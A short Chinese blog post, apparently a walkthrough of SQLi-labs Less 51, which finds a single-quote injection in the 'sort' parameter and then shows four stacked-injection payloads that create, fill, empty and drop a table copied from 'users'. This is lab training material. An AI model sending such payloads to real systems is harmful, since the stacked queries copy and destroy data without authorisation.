Sqli labs less 51

1.输入正常参数，网页回显用户名列表。对 sort 参数使用单引号闭合，网页返回错误信息。

2.将后面的内容注释掉，网页返回正常的信息，得出此处存在单引号闭合的字符型注入。

3.堆叠注入

和 Less 47 一样使用报错注入或时间注入就可以完成，此处用于测试堆叠注入。使用堆叠查询完成 Less 38 的样例。

?sort=1';CREATE TABLE WhiteMoon LIKE users;--+
?sort=1';INSERT INTO WhiteMoon SELECT * FROM users;--+
?sort=1';DELETE FROM WhiteMoon;--+
?sort=1';DROP TABLE WhiteMoon;--+

posted @ 2021-09-16 13:57 Nuyoah_QQ 阅读(25) 评论(0) 收藏举报

刷新页面返回顶部

Nuyoah_QQ

Sqli labs less 51

公告